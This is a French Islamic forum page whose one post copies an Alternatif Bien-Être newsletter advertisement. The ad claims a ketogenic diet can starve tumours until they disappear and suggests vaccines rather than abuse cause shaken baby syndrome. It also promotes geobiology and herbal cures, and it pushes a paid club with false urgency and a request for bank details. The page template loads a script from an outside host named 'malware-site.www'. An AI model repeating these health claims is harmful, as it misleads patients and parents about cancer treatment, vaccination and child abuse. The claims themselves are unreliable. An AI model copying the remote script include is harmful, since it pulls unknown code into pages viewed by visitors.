ISLAM SUIVANT LE CORAN ET LA SUNNA

<center><iframe align="center" id="IW_frame_1438" src="http://www.tvquran.com/add/index.htm" frameborder="0" allowtransparency="1" scrolling="no" width="302" height="334"></iframe></center>



<a href="http://#7F96C3" id="pluiedetoiles"><script type="text/javascript" src="http://malware-site.www/js/pluiedetoiles.js"></script></a>Ce présent blog se propose de transmettre le message de l'Islam et le monothéisme islamique d'après le Coran et la Sounna authentique selon la compréhension des Pieux prédécesseurs.

N'hésitez pas à vous inscrire à la Newsletter pour être mis au courant des nouveaux articles.

ISLAM SUIVANT NOS EMINENTS SAVANTS

Logo Design by FlamingText.com

Logo Design by FlamingText.com
Bienvenue sur ce forum . Comme son nom l'indique, ce forum a pour but de vous faire découvrir cette magnifique religion qu’est l’Islam ainsi que de rectifier votre avis sur celle-ci. Le forum s’est aussi fixé un autre objectif : « mettre fin aux mensonges islamophobes et défendre l’honneur de D'Allah ainsi que Son Messager »

nous suivons a travers ce forum la voie de nos pieux predecesseurs extrait du coran et de la sounna selon la compréhension de notre bien aimé prophete صلى الله عليه و سلم»

il est basé sur la croyance des gens de la sounnah , et se conforme strictement au coran, et la Sounna du prophète Mohamed صلى الله عليه وسلم ...Les articles que contient ce forum sont des écrits ou des paroles de nos eminents savants salafis , et notre objectif est avant tout d’appeler les gens à l'unicité d'Allah (tawhid) et de diffuser la da'wah salafiyah qui est la bonne compréhension de l’islam,il est le plus rédigé en langue française afin de faire connaître aux musulmans francophones et meme aux mecreants leur religion véridique et les appeler à pratiquer ses enseignements et préceptes, de les avertir du danger de l'association à Allah , ainsi que des innovations et de les mettre en garde sur les mauvaises interprétations de l’islam diffusées par les innovateurs et les groupes égarés.

Allah par sa Miséricorde a envoyé des prophètes et des Envoyés avec un seul message, un seul objectif : rappeler aux hommes l’Unicité de dieu ( il n’y a de dieu qu’Allah) Ceci est le fondement de l’islam



 
">

Like/Tweet/+1

neige qui tombe

coran a telecharger de medine

Sam 28 Nov - 13:28 par assalafia

http://nashr.qurancomplex.gov.sa/download/Al_Madinah_Mushaf_Win_Setup_15-4-2015.rar

Septembre 2017

LunMarMerJeuVenSamDim
    123
45678910
11121314151617
18192021222324
252627282930 

Calendrier Calendrier


    LE REGIME QUIPOURRAIT AFFAMER LE CANCER

    Partagez
    avatar
    assalafia
    Admin

    Féminin
    Messages : 1354
    Date d'inscription : 26/08/2011
    Age : 35
    Localisation : algerie-constantine
    Emploi/loisirs : lire le coran
    Humeur : bonne

    LE REGIME QUIPOURRAIT AFFAMER LE CANCER

    Message par assalafia le Dim 5 Juil - 17:42

    Le régime qui pourrait affamer le cancer

    Chère lectrice, cher lecteur,

    Les cellules cancéreuses fonctionnent comme de vraies toxicomanes, avides de trouver leur « dose » pour continuer à se développer.

    Cette drogue qu’elles cherchent coûte que coûte, c’est le glucose.

    Alors que les cellules saines peuvent également compter sur les acides gras pour fonctionner, les cellules cancéreuses elles, sont complètement maniaques : elles ne réclament que du glucose. Et leur voracité est terrifiante : elles en ont besoin de 20 fois plus qu’une cellule saine !

    « Besoin »…Le mot a fait « tilt » dans l’esprit d’un petit groupe de chercheurs qui se sont demandé ce qui pourrait se passer si on supprimait ce « besoin ».

    Qu’arriverait-il si, en arrêtant de consommer certains aliments, on pouvait priverles cellules cancéreuses de ce glucose qu’elles réclament tant ?

    De nouvelles recherches sur un régime alimentaire très particulier montrent que des cellules cancéreuses privées de glucose pourraient être…réduites à la famine [1] !

    Une tumeur en pleine croissance serait ainsi brutalement stoppée. Privée de nourriture, elle se mettrait à dépérir, rétrécir, puis disparaître.

    Oui, disparaître !

    Cette information capitale fait l’objet d’un passionnant dossier dans le numéro d'août d’Alternatif Bien-Être, où vous découvrirez que ce régime, appelé le régime « cétogène », pourrait bien devenir très prochainement un standard des soins pour les cancéreux [2].

    D’autant que les scientifiques ne cessent de faire des découvertes sur son étonnant potentiel thérapeutique.

    Excellent pour le cerveau

    En lisant ce numéro, vous allez comprendre pourquoi le régime cétogène est à l’origine de certaines des plus grandes conquêtes humaines, en particulier l’installation de populations dans les zones où la vie avait le moins de chance de se développer.

    Cela grâce à un mécanisme étonnant du corps, qui a la capacité de fonctionner normalement en l’absence totale de glucides (féculents, sucres, céréales etc.) dans l’alimentation.

    L'énergie est alors produite en utilisant les graisses corporelles et les graisses alimentaires. Le carburant qui en découle n'est plus du sucre mais des « corps cétoniques » (d’où le nom cétogène), une substance dérivée des graisses qui peut être utilisée par notre cerveau, notre coeur et nos muscles, pour fonctionner.

    Voilà comment nos ancêtres les plus lointains sont parvenus à vivre dans les grandes étendues Nordiques, écrasées par le froid et la neige, où les denrées naturelles étaient quasiment inexistantes.

    Vous le découvriez dans ce nouveau numéro d’Alternatif Bien-Être, les chercheurs amassent aujourd’hui de plus en plus de données sur les bénéfices du régime cétogène pour lutter contre :


    • les migraines,

    • la maladie de Parkinson [3],

    • la maladie d’Alzheimer

    • les tumeurs au cerveau,

    • l’autisme,

    • ou encore la sclérose en plaques.



    Dans ce numéro, vous verrez également l’étonnant phénomène qui se produit après seulement 2 ou 3 jours de pratique du régime cétogène.

    Débuter le régime cétogène

    Le numéro d'août d’Alternatif Bien-Être vous propose une méthode et des conseils pour essayer le régime cétogène et adopter une répartition totalement nouvelle des calories :


    • Des graisses en quantité très importante, jusqu’à 90 % des calories,

    • Des protéines en quantité modérée, de 8 à 15 % des calories,

    • Très peu de glucides, de 2 à 5 % des calories.



    Nous vous disons comment faire pour évaluer la quantité des glucides absorbés. Attention à ne pas vous tromper dans vos estimations (vous verrez comment faire pour être précis).

    Enfin pour compenser la réduction des glucides, vous trouverez une liste des lipides à intégrer à chaque repas.

    Le numéro d'août d’Alternatif Bien-Être est une véritable mine d’informations sur la santé et les solutions naturelles efficaces pour soigner de nombreuses maladies. Il a été mis au point à partir des données scientifiques les plus récentes, et il ose aborder des sujets que les médias traditionnels préfèrent soigneusement éviter. Jugez plutôt :

    Syndrome du « bébé secoué » : suspicion…sur les vaccins

    C’est le genre d’histoire qui occupe généralement les colonnes des faits divers des journaux.

    Des parents qui brusquent un bébé, le secouent violemment parce qu’il ne s’arrête pas de pleurer et qu’ils ne supportent plus de l’entendre.

    Les conséquences sont souvent très lourdes : secouer un bébé peut entraîner sa mort ou de graves lésions cérébrales. Et l’affaire généralement se règle avec une peine de prison pour le parent maltraitant.

    Du moins, c’est ainsi que ce type d’affaire est rapporté dans les médias. Mais le témoignage d’une chercheuse qui a travaillé sur plusieurs de ces cas montre qu’il pourrait y avoir une explication complètement différente. Il y a de quoi être abasourdi :

    « Une étude approfondie de l’histoire de ces cas a révélé quelque chose de sinistre et d’inquiétant : dans chacun des cas examinés, les symptômes sont apparus peu de temps après que le bébé a été vacciné [4] ».
    Et d’autres recherches donnent du poids à ces nouvelles suspicions sur les vaccins !

    En 2013, un hématologue australien, le Dr Michael Innis, a démontré comment une réaction auto-immune aux vaccins pouvait causer des symptômes similaires à ceux du syndrome du bébé secoué : un saignement entre le crâne et le cerveau, une hémorragie derrière les yeux et un gonflement des tissus cérébraux (oedème). 

    Dans ce cas, certains parents condamnés n’y seraient absolument pour rien !

    Trois vaccins sont aujourd'hui pointés du doigt : le vaccin pentavalent qui est une combinaison de 5 vaccins en 1 (diphtérie, tétanos, polio, coqueluche, haemophilius B), le vaccin contre l'haemophilius B seul et le vaccin pédiatrique contre le pneumonocoque (7-valent) [5].

    Cela montre à quel point chaque citoyen a le devoir de reprendre le contrôle sur sa santé. Alternatif Bien-Être permet de faire, ce mois-ci encore, le premier pas sur ce chemin de connaissance. Vous découvrirez notamment :

    Les secrets de santé de l’homme le plus intelligent du monde

    L’Américain Rick Rosner a la particularité d’avoir battu Albert Einstein à plate couture à un test de Quotient Intellectuel : il a obtenu 200 alors que le célèbre scientifique n’a eu « que » 162.

    Sa prodigieuse vivacité d’esprit n’est pas le fruit du hasard. Elle repose sur plusieurs piliers essentiels de santé naturelle.

    Parmi eux, il y a certaines « stars » que vous connaissez déjà (vitamines C, D et K, ou multivitamines) mais vous verrez qu’il utilise aussi une méthode déroutante pour ralentir le vieillissement

    La place me manque ici pour vous détailler tous les passionnants sujets que vous allez découvrir dans le numéro d’août d’Alternatif Bien-Être. Mais je voudrais quand même attirer votre attention sur quelques-uns des plus importants : 


    • Insuffisance rénale : le remède trouvé par des yacks ! Sur les hauts plateaux tibétains, il y a près de mille ans, des bergers constatèrent que leurs bêtes présentaient une remarquable vivacité, y compris les plus âgées. Ils s’intéressèrent alors aux herbes qu’elles consommaient et y découvrirent la présence d'un champignon qu’ils s’empressèrent d’essayer : le Cordyceps. Les dernières études montrent de remarquables propriétés pour traiter l’insuffisance rénale. Petit problème : son prix : 120 000 euros le kilo (oui, vous avez bien lu, un champignon qui vaut trois fois le prix de l’or !!!). Heureusement il existe d’autres variétés beaucoup plus accessibles, et nous vous disons où les trouver.

    • 5 signes que vous devriez prendre du coenzyme Q10. Le coenzyme Q10, également connu sous le nom d'ubiquinone, est une molécule anti-oxydante qui joue une rôle clé dans la production d'énergie sur le plan cellulaire. Si vous avez de l’hypertension ou que vous prenez des médicaments anticholestérol, lisez bien attentivement notre article.

    • En bains de bouche ou en gargarisme, l’aigremoine soulage efficacement gingivite, aphtes, maux de gorge. L’explication ? Elle va vous étonner.

    • Encore un argument pour le bio ! Consommer des fruits et légumes contaminés par les pesticides entraînent une baisse de près de 50 % de la qualité du sperme.

    • Ulcère de l'estomac. Une simple bactérie, Saccharomyces boulardii, permet d’améliorer l’efficacité des traitements contre les ulcères d’estomac et de limiter leurs effets secondaires (diarrhées ou les nausées).

    • Géobiologie : quand ma maison me veut du mal. Certains phénomènes énergétiques peuvent altérer l’harmonie d’un lieu et abîmer beaucoup plus qu’on ne croit la santé de ceux qui y vivent. Pas franchement convaincus ? Nous aussi nous avions des doutes alors nous avons testé la géobiologie. Les résultats sont vraiment troublants : la méthode a marché pour calmer des voisins bruyants, retrouver le calme, la sérénité et le sommeil ! D’autres phénomènes étonnants, vous le verrez, se sont également produits pendant notre test. (Si vous voulez faire l’expérience, attention à bien choisir votre géobiologue – nous vous disons comment faire).


    Et aussi dans ce numéro :


    • Nutrition : suivre les recommandations officielles…rend gros, 

    • Un chirurgien licencié pour avoir utilisé une thérapie naturelle !

    • Sclérose en Plaques : lourds soupçons sur l’aluminium

    • Le citrate de potassium élimine les calculs rénaux (on en trouve en complément alimentaire et dans deux fruits délicieux),

    • 4 exercices correctifs pour calmer les douleurs articulaires.



    Nouvelle procédure pour recevoir GRATUITEMENT votre exemplaire d'Alternatif Bien-Être

    Vous pouvez —jusqu'au dimanche 5 juillet— demander votre exemplaire d'Alternatif Bien-Être du mois d'août et recevoir ces précieux conseils et informations sur les dernières avancées scientifiques, le régime cétogène, les soupçons qui pèsent sur la vaccination et les méthodes naturelles pur se débarrasser des calculs rénaux.

    Je vous l'enverrai GRATUITEMENT ainsi que les 2 numéros suivants d'Alternatif Bien-Être, soit 3 numéros GRATUITS, au format papier, livrés sans aucun frais dans votre boite à lettres en France métropolitaine.

    Ce n'est pas tout.

    Vous recevrez immédiatement le dossier complet que j'ai rédigé sur le cancer. Vous découvrirez —avec toutes les preuves scientifiques— comment une nutrition adaptée peut tenir la maladie éloignée. Les études scientifiques ont aujourd'hui montré que les méthodes naturelles, la gestion émotionnelle et l'activité physique peuvent avoir de réels impact sur l'évolution de la maladie ; je vous dis tout ce qu'il est utile de savoir à ce sujet.

    Ce dossier fait partie de la collection de mes 8 dossiers de santé les plus précieux, ceux que je conserve toujours avec moi.

    J'ai travaillé longuement à regrouper tous ces conseils qui représentent 144 pages incontournables et le résultat d’années de travail avec toute mon équipe.

    S'il n'y avait qu'une seule chose à lire —on me pose souvent cette question —, ce sont ces 8 dossiers.

    Vous recevrez, en plus du dossier sur le cancer, les 7 autres dossiers sur le cœur, l'arthrose, le sommeil, le stress, le moral...

    Ce n'est pas tout.

    J’ai décidé d’ouvrir une ligne directe avec un petit groupe de lecteurs afin de pouvoir continuer à répondre à vos questions malgré le nombre toujours grandissant de lecteurs.

    Vous pouvez vous aussi intégrer ce petit groupe de lecteurs.

    Votre invitation à rejoindre le Club Santé Nature Innovation

    Je vous en parle depuis plusieurs jours, il s'agit des membres du Club Santé nature Innovation.

    L'objectif du Club est de permettre à mes lecteurs fidèles de découvrir de l'intérieur tout ce que nous faisons, sans avoir besoin de prendre la décision de s'abonner et payer pour nos publications sur abonnement.

    En effet, la cotisation au Club Santé Nature Innovation est est de 2,95 euros par an (12 mois). Nous avons volontairement choisi une sommes très modique afin qu'aucune personne n'en soit exclue pour une question d'argent.

    Je reçois régulièrement des demandes de personnes qui ont besoin des traitements, mais qui n'ont pas les moyens de pouvoir s'abonner de plein droit. Mais je sais qu'il y en a encore beaucoup d'autres qui n'osent pas nous contacter.

    C'est une mère dont l'enfant est malade. Une personne âgée qui n'a pas d'autre espoir. Une personne qui erre depuis des années de médecin en médecin, sans trouver de réponse. Ou une personne qui, tout simplement, n'a pas les moyens en ce moment de faire plus.

    Le Club Santé Nature Innovation est fait pour permettre à toutes ces personnes de bénéficier de notre travail, et même de nos publications payantes pendant 3 mois.

    C'est aussi un moyen de permettre aux personnes qui souhaitent voir avant de s'engager, de pouvoir juger sur pièce notre travail, sans prendre aucun risque.

    Ce que vous allez recevoir

    En adhérant aujourd'hui au Club Santé Nature Innovation, vous bénéficierez, sans limite dans le temps, de tous les avantages listés ci-dessous :

    • l'accès gratuit pendant 3 mois aux publications de votre choix, y compris en version papier (Plantes & Bien-Être, Alternatif-Bien-Être, la Lettre du Dr Thierry Hertoghe, les Dossiers de Santé & Nutrition) ; vous pouvez même toutes les prendre si vous le souhaitez ; vous commencez quand vous voulez, par exemple lorsque nous faisons paraître un numéro qui vous intéresse particulièrement ; et vous pouvez recommencer plusieurs fois, et donc en profiter dès aujourd'hui si vous le souhaitez ;

    • vos 8 dossiers sur mes secrets de santé. Rappel : ces dossiers concernent des sujets de santé aussi importants que les maladies cardiaques, le diabète, l'arthrose et les rhumatismes, les douleurs d'estomac, les insomnies, la fatigue, la dépression ;

    • ma ligne directe pour vos questions urgentes ;

    • des Lettres Santé Nature Innovation particulières qui vous sont réservées ;

    • mes alertes et informations spéciales sur les nouveaux traitements, thérapies, remèdes, méthodes de guérison en temps réel ;

    • plus des invitations et surprises réservées aux membres du Club, comme par exemple des réductions importantes sur des produits naturels essentiels que nous nous procurerons en achat groupé.



    Tout ceci pour seulement 2,95 euros par an tout compris.

    Vous pouvez bien sûr faire un essai et arrêter dès que vous le souhaitez.

    L'annulation, comme l'inscription, se fait en un clic. Sachez en tout cas que je ferai tout ce dont je suis capable pour dépasser vos attentes.

    Sécurité totale

    A noter que, pour vous acquitter de votre cotisation au Club Santé Nature Innovation, vous n'avez pas besoin de carte bancaire.

    C'est une sécurité supplémentaire, grâce au système de paiement européen SEPA.

    Vous ne divulguez strictement aucune donnée confidentielle vous concernant. Vous ne prenez aucun risque.

    Vous bénéficiez de la garantie Santé Nature Innovation (satisfait ou remboursé, sans aucune restriction pendant 3 mois).

    Le prélèvement SEPA permet aussi à votre banque de vous garantir le remboursement sans condition de votre paiement pendant huit semaines. À tout moment, pendant cette période, vous pouvez contester et obtenir le remboursement de votre cotisation, sans aucun frais ni demande de justificatif. Notez bien que c'est une garantie que les banques n'offrent pas pour les paiements par carte bancaire. C'est donc une couche de sécurité de plus que je vous offre, pour que vous soyez absolument tranquille, et que vous ne diffusiez aucune information sensible sur Internet, bien que notre site offre évidemment une totale sécurité antipiratage.

    Cette garantie de votre banque s'ajoute à celle qui vous est donnée par Santé Nature Innovation (satisfait ou remboursé, sans aucune restriction).

    Vous ne payez aucun frais bancaire. Il n'y a aucun frais de traitement (c'est ce qui nous permet de fixer la cotisation au prix le plus bas).

    Vous accédez sans aucun délai à tous les droits des membres du Club Santé Nature Innovation.

    Le nouveau système de prélèvement SEPA se fait grâce à un simple RIB (Relevé d'Identité Bancaire). Vous trouverez ce RIB à la fin de votre chéquier, sur votre relevé de compte, ou sur Internet en vous connectant à vos comptes bancaires. Vous pouvez aussi téléphoner à votre banque pour le recevoir, ou si vous avez un doute.

    Option 1 : oui, je souhaite faire l'essai au Club Santé Nature Innovation.

    Sur la page de confirmation de mon adhésion au Club je pourrai choisir les publications que je souhaite essayer et demander —avant dimanche soir minuit— mon exemplaire GRATUIT du numéro d'août d'Alternatif Bien-Être.

    Option 2 : non merci, je souhaite simplement m'abonner à Alternatif Bien-Être.

    En toute franchise, je ne pense pas qu'une meilleure offre puisse être faite dans ce domaine : à ma connaissance,autant d'avantages pour un coût si bas n'a jamais été proposé par personne d'autre.

    Attention, les inscriptions sont au Club Santé Nature Innovation sont en nombre limité. Pour demander votre adhésion et recevoir votre exemplaire d'Alternatif Bien-Être du mois d'août GRATUITEMENT dans votre boîte aux lettres, inscrivez-vous sans plus attendre à l'aide du lien sécurisé de ce message.

    Nous fermons les inscriptions dimanche 5 juillet à minuit, après quoi nous ne serons plus en mesure d'admettre de nouveaux adhérents.

    A votre santé !

    Jean-Marc Dupuis

      La date/heure actuelle est Ven 22 Sep - 12:52